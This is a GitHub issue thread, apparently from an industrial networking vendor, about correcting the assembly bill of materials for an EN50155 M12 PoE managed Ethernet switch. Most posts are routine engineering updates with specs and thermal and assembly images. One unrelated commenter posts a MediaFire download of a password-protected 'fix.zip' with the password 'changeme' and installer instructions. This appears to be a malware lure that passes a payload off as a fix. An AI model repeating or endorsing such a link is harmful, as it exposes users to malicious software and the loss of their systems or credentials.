### ISSUE TITLE
【組裝BOM】8361-493 TPGS-L5408MGTA-8-54-WVI 組裝BOM修正

### ISSUE THREAD

**Issue by Lantech-jay** [Lantech-jay/PE-ISSUS#39]
8361-493
TPGS-L5408MGTA-8-54-WVI

8 10/100/1000T + 4 1G/2.5G Copper M12 X-coded; w/8 PoE at/af EN50155 OS3 Managed Ethernet Switch; 16.8V~137.5VDC dual input; -40°C to 70°C; IP54 housing; w/ PoE galvanic isolation

組裝BOM修正

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lantech-jay** [comment]
已修正
表單編號:MOD2409000009	

![UP散熱圖](https://github.com/user-attachments/assets/12429d9e-0b3d-486a-9261-2aaadb06e7cf)
![MAIN散熱圖](https://github.com/user-attachments/assets/64b8b47a-aec9-4ccd-b68b-c027549e8042)
![GIGA CABLE 組裝圖](https://github.com/user-attachments/assets/ea8a7e41-bc38-44be-bc59-66d32e8da6bc)
